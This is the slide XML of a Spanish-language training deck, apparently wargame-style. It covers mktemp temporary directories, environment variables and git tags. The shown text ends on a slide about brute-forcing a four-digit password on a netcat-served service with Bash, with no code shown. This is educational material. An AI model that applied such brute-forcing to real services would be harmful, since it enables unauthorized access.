              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-330200" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
              <a:defRPr sz="16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74" name="Google Shape;74;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841248" y="2099734"/>
            <a:ext cx="3200400" cy="3810001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1040"/>
              <a:buNone/>
              <a:defRPr sz="1300"/>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0"/>
              <a:buNone/>
              <a:defRPr sz="1000"/>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75" name="Google Shape;75;p40"/>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0"/>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0"/>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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11292840" y="0"/>
            <a:ext cx="914400" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A7A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31"/>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lt1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Century Schoolbook"/>
              <a:buNone/>
              <a:defRPr sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt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31"/>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lt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FEFEFE"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;9;p31"/>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F6F5F4"/>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0" name="Google Shape;10;p31"/>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F6F5F4"/>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1" name="Google Shape;11;p31"/>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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11292840" y="0"/>
            <a:ext cx="914400" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34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0"/>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400"/>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30"/>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23" name="Google Shape;23;p30"/>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a:solidFill>
                  <a:srgbClr val="DADADA"/>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4" name="Google Shape;24;p30"/>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a:solidFill>
                  <a:srgbClr val="DADADA"/>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5" name="Google Shape;25;p30"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" marR="0" lvl="5" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" marR="0" lvl="6" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" marR="0" lvl="7" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="none">
                <a:solidFill>
                  <a:srgbClr val="8E8E93"/>
                </a:solidFill>
                <a:latin typeface="Century Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" marR="0" lvl="8" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="0" u="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444870" y="204056"/>
            <a:ext cx="9671050" cy="76993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FEFEFE"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Lucida Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Utilización del directorio temporal y variables de entorno.</a:t>
            </a:r>
            <a:endParaRPr sz="28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63650" y="1054099"/>
            <a:ext cx="10160000" cy="5326321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cuando no tenemos suficientes permisos para crear y ejecutar ficheros podemos usar un directorio temporal, con el comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mktemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -d, se recomienda crear una variable de entorno de la siguiente manera, en la consola colocar...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mydir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>=$( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mktemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -d )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ------------- &gt; Asignamos a la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mydir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> el directorio temporal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>         Entonces solo con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cd $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mydir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ingresamos al directorio, ahí podremos crear scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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Cuando tengamos que lidiar con muchas rutas dentro de una máquina podemos utilizar variables de entorno como en el ejemplo anterior, e ir anotándolas en otro sitio, de esta 	forma si queremos regresar a un  directorio hacemos uso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, se 	recomiendan nombres cortos y descriptivos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Github 3 Atender tags</a:t>
            </a:r>
            <a:endParaRPr sz="28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652632" y="1347026"/>
            <a:ext cx="10310069" cy="5033394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="584200" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="180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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Los tags son ramas inmutables que suelen utilzarse como punto de partida o backup de cierto avance o comienzo, para listarlos utilizamos el comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 		git tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="180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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Para ver el contenido de un tag utilizamos el comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>git show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“nombretag”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="180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smtClean="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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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556470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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Fuerza bruta orientada a conexiones (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Un ejemplo primitivo de fuerza bruta es probar combinaciones de números, en caso de que un servidor con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, tenga como contraseña una combinación de ciertos dígitos por ejemplo 4 dígitos.</a:t>
            </a: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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
